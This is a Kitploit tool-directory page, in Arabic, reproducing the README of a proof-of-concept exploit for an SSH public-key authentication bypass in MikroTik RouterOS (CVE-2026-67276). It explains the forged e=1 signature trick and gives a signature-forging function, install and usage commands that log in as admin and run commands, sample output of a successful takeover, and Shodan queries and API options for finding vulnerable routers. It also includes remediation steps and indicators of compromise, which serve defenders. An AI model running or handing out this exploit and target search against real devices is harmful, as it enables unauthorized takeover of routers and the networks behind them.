Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
exploit-mikrotik-2026 — # استغلال تجاوز المصادقة SSH في MikroTik RouterOS CVE-2026-67276 | Kitploit
أدوات/GitHubGitHub/blackhatexploitation/exploit-mikrotik-2026
الاستطلاعتحليل الثغرات الأمنيةالاستغلالجمع المعلوماتأمن الشبكاتاختبار الاختراقالمصادقة
GitHubblackhatexploitation/exploit-mikrotik-2026

exploit-mikrotik-2026

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

# استغلال تجاوز المصادقة SSH في MikroTik RouterOS CVE-2026-67276

عرض المستودع
منذ 8س 16دلم تتم المراجعة بعد

CVE-2026-67276 - استغلال تجاوز مصادقة SSH في MikroTik

CVE Severity Type Platform

تجاوز مصادقة المفتاح العام SSH في MikroTik RouterOS - لا يتطلب مفتاح خاص

إثبات مفهوم لاستغلال CVE-2026-67276 (MikroTrick)، وهي ثغرة حرجة في تجاوز المصادقة في تطبيق SSH الخاص بـ MikroTik RouterOS تسمح للمهاجمين بالمصادقة كأي مستخدم دون امتلاك مفتاحهم الخاص.


جدول المحتويات

  • نظرة عامة على الثغرة
  • كيف تعمل
  • الإصدارات المتأثرة
  • التثبيت
  • الاستخدام
  • الاستطلاع عبر Shodan
  • التفاصيل التقنية
  • المعالجة
  • المراجع
  • إخلاء المسؤولية

نظرة عامة على الثغرة

سلسلة هجوم MikroTrick

CVE-2026-67276 جزء من سلسلة هجوم أكبر أطلق عليها اسم "MikroTrick" من قبل CERT PL، والتي لوحظ استغلالها بنشاط في البرية:


كيف تعمل

الثغرة

مصادقة SSH في RouterOS تحتوي على خلل حرج في طريقة التحقق من المفاتيح العامة:

  1. خطأ مطابقة المفاتيح: يطابق RouterOS كتلة المفتاح العام SSH المقدمة مع المفاتيح المصرح بها باستخدام (نوع المفتاح، المعامل) فقط، متجاهلاً الأس تماماً
  2. الأس من العميل: يستخدم التحقق من التوقيع الأس من الكتلة المقدمة من العميل، وليس من المفتاح المخزن
  3. تزوير تافه: تقديم {ssh-rsa, e=1, n=معامل_الضحية} يجعل التحقق تافهاً

الأساس الرياضي

root@kitploit:~
التحقق القياسي من RSA:  sig^65537 mod n == المتوقع  (يتطلب مفتاح خاص)
التحقق المستغل:         sig^1 mod n == sig           (لا يتطلب مفتاح خاص!)

مع الأس e=1، يصبح التحقق من التوقيع:

root@kitploit:~
sig^1 mod n == sig

هذا يعني أن "التوقيع" هو ببساطة رسالة EMSA-PKCS1-v1_5 المشفرة نفسها - يمكن إنشاؤها من قبل أي شخص يعرف المعامل العام للضحية.

متطلبات الهجوم

  1. اسم مستخدم هدف لحساب لديه مفتاح RSA مصرح به
  2. المعامل العام RSA n لذلك المفتاح المصرح به (من ملف .pub، اتصالات سابقة، إلخ)
  3. وصول شبكي إلى منفذ SSH

الإصدارات المتأثرة

الفرعالنطاق المتأثرالإصدار المُصحح
6.x6.0 - 6.49.206.49.21+

التثبيت

root@kitploit:~
# استنساخ المستودع
git clone https://github.com/BlackHatExploitation/exploit-mikrotik-2026.git
cd exploit-mikrotik-2026

# تثبيت التبعيات
pip install paramiko cryptography

الاستخدام

بدء سريع

root@kitploit:~
# استغلال أساسي - يولّد مفتاحاً تلقائياً ويكتشف الإصدار
python3 full_exploit.py --host 192.168.88.1 --username admin

# تنفيذ أمر بعد المصادقة
python3 full_exploit.py --host 192.168.88.1 --username admin --exec '/system resource print'

# منفذ مخصص
python3 full_exploit.py --host 192.168.88.1 --port 2222 --username admin

استخدام مفتاح عام موجود

root@kitploit:~
# إذا كان لديك ملف المفتاح العام للضحية
python3 full_exploit.py --host 192.168.88.1 --username admin --pubkey victim.pub

# أو توفير المعامل مباشرة
python3 full_exploit.py --host 192.168.88.1 --username admin --modulus-hex "00:ab:cd:..."

اكتشاف الإصدار

يكتشف الاستغلال تلقائياً إصدار RouterOS ويتحقق من حالة الثغرة:

root@kitploit:~
# فرض الاستغلال حتى على غير MikroTik أو إصدار غير معروف
python3 full_exploit.py --host 192.168.88.1 --username admin --skip-version-check

جميع الخيارات

root@kitploit:~
--host              عنوان IP/اسم مضيف RouterOS المستهدف (مطلوب)
--port              منفذ SSH (الافتراضي: 22)
--username          اسم مستخدم RouterOS المستهدف (مطلوب)
--pubkey            ملف المفتاح العام RSA (يولّد تلقائياً إذا لم يُقدم)
--modulus-hex       معامل RSA بصيغة hex (بديل عن --pubkey)
--algos             خوارزميات التوقيع (الافتراضي: ssh-rsa,rsa-sha2-256)
--exec              الأمر المراد تنفيذه بعد المصادقة
--exp-enc           ترميز الأس: canonical (1 بايت) أو aligned (3 بايت)
--timeout           مهلة الاتصال (الافتراضي: 15.0 ثانية)
--skip-version-check    تخطي التحقق من إصدار RouterOS
--shodan-dorks      طباعة استعلامات بحث Shodan
--shodan-search     البحث في Shodan API عن الأهداف
--shodan-key        مفتاح Shodan API
--shodan-query      استعلام Shodan مخصص
--shodan-limit      حد نتائج Shodan (الافتراضي: 100)

الاستطلاع عبر Shodan

طباعة Dorks

root@kitploit:~
python3 full_exploit.py --shodan-dorks

البحث في Shodan API

root@kitploit:~
# بحث أساسي
python3 full_exploit.py --shodan-search --shodan-key YOUR_API_KEY

# استعلام مخصص
python3 full_exploit.py --shodan-search --shodan-key YOUR_KEY --shodan-query 'MikroTik port:22 country:US'

استعلامات Shodan مفيدة


التفاصيل التقنية

بنية كتلة المفتاح العام SSH

root@kitploit:~
string    "ssh-rsa"
mpint     e (الأس العام)  <- يقدمه المهاجم كـ e=1
mpint     n (المعامل)     <- المعامل الفعلي للضحية

توليد التوقيع المزور

root@kitploit:~
# "التوقيع" هو ببساطة بيانات المصادقة المشفرة بـ EMSA-PKCS1-v1_5
def forged_signature(data, sig_alg, n):
    k = (n.bit_length() + 7) // 8
    block = emsa_pkcs1_v15(data, sig_alg, k)
    return block  # هذا هو التوقيع الصحيح عندما يكون e=1

ملاحظات حول تنسيق الإرسال

  • تبقى سلسلة النوع الداخلي للكتلة ssh-rsa حتى مع خوارزميات rsa-sha2-256/512
  • خوارزمية التوقيع توضع فقط في حقل الخوارزمية الخارجي
  • كلا ترميزي e=1 (canonical ببايت واحد و aligned بثلاثة بايتات) يعملان على الإصدارات المتأثرة

مثال على المخرجات

root@kitploit:~
[*] CVE-2026-67276 MikroTrick Exploit
[*] الهدف: 192.168.88.1:22

[*] اكتشاف إصدار RouterOS...
[*] لافتة SSH: SSH-2.0-ROSSSH-7.23.3
[*] إصدار RouterOS: 7.23.3
[+] الإصدار متأثر - CVE-2026-67276 ينطبق

[*] توليد زوج مفاتيح RSA بطول 2048 بت...
[+] تم حفظ المفتاح الخاص: /path/to/exploit_key
[+] تم حفظ المفتاح العام:  /path/to/exploit_key.pub
[*] المعامل: 2048 بت | e=1 مزور
[*] ترميز الأس: canonical (01)

[*] محاولة rsa-sha2-256 ...
[+] تمت المصادقة باسم 'admin' عبر rsa-sha2-256
[+] تم تأكيد CVE-2026-67276 - الهدف متأثر
--- مخرجات الأمر ---
                uptime: 14d23h45m12s
               version: 7.23.3 (stable)
            build-time: Sep/01/2026 12:00:00

المعالجة

1. الترقية فوراً

root@kitploit:~
# التحقق من الإصدار الحالي
/system resource print

# الترقية إلى الإصدار المُصحح
/system package update download
/system reboot

الحد الأدنى للإصدارات الآمنة:

  • فرع 6.x: 6.49.21
  • 7.x مستقر: 7.23.4
  • 7.x تجريبي: 7.24.2

2. تعطيل SSH إذا لم يكن مطلوباً

root@kitploit:~
/ip service disable ssh

3. تقييد الوصول إلى SSH

root@kitploit:~
# حسب عنوان IP
/ip service set ssh address=192.168.88.0/24

# قاعدة جدار الحماية
/ip firewall filter add chain=input dst-port=22 protocol=tcp \
    src-address=!192.168.88.0/24 action=drop

4. التحقق من الاختراق

root@kitploit:~
# التحقق من المستخدمين المشبوهين
/user print

# التحقق من مستخدم "ops" (مؤشر معروف للمهاجمين)
/user print where name=ops

# التحقق من حالة وضع الجهاز المعلّم
/system/device-mode/print

# التحقق من السجلات
/log print where topics~"ssh"

مؤشرات اختراق معروفة:

  • إدخالات السجل: login failure for user -2 via ssh
  • مستخدم غير معروف بصلاحيات ops
  • علامة "Flagged" على الجهاز
  • عناوين IP للمهاجمين: 82.192.72.4, 103.102.31.18

المراجع

  • نشرة CERT PL
  • تفاصيل CVE من CERT PL
  • نشرة أمان MikroTik
  • RFC 8017 - PKCS#1 v2.2
  • RFC 8332 - استخدام مفاتيح RSA مع SHA-256/512 في SSH
  • RFC 4252 - بروتوكول مصادقة SSH

إخلاء المسؤولية

⚠️ هذه الأداة مقدمة لأغراض اختبار الأمان المصرح به والأغراض التعليمية فقط.

  • استخدمها فقط ضد الأنظمة التي تملكها أو لديك إذن كتابي صريح لاختبارها
  • الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني بموجب CFAA وقانون إساءة استخدام الحاسوب والقوانين المماثلة حول العالم
  • المؤلفون غير مسؤولين عن أي إساءة استخدام أو ضرر ناتج عن هذه الأداة
  • باستخدامك لهذه الأداة، فإنك توافق على استخدامها بمسؤولية ووفقاً للقانون

الترخيص

رخصة MIT - انظر LICENSE للتفاصيل.


المؤلف

إثبات مفهوم بحث أمني - تنفيذ مخبري لـ CVE-2026-67276

قم بتمييز هذا المستودع بنجمة إذا وجدته مفيداً!

تنزيل الأداة
التفصيلالمعلومات
معرف CVECVE-2026-67276
الخطورةحرجة (CVSS 9.8)
CWECWE-347 (تحقق غير صحيح من التوقيع المشفر)
ناقل الهجومالشبكة
المصادقةلا شيء
التعقيدمنخفض
التأثيراختراق كامل للجهاز
CVEالنوعالوصف
CVE-2026-67276تجاوز مصادقةتجاوز مصادقة المفتاح العام SSH عبر تزوير الأس
CVE-2026-86060تصعيد صلاحياتحقن وسائط عبر اسم المستخدم
CVE-2026-67279تجاوز مصادقةاتصال SSH دون إكمال مصادقة المستخدم
CVE-2026-67277كشف معلوماتتسرب ذاكرة النواة عبر bandwidth-test
CVE-2026-67278تجاوز توقيعقبول توقيع X.509 مشوه
CVE-2026-67281قراءة ملفاتقراءة ملفات الجذر في WebFig عبر jsproxy
7.x مستقر
7.0 - 7.23.3
7.23.4+
7.x تجريبي7.24.0 - 7.24.17.24.2+
الهدفالاستعلام
جميع MikroTikMikroTik
MikroTik SSHMikroTik port:22
Winbox مكشوفport:8291
لوحة WebFighttp.title:RouterOS
RouterOS 6.49.xMikroTik "6.49"
RouterOS 7.xMikroTik "RouterOS v7"
حسب الدولةMikroTik country:US
مؤشر الثغرةMikroTik ("6.49" OR "7.23" OR "7.24.0")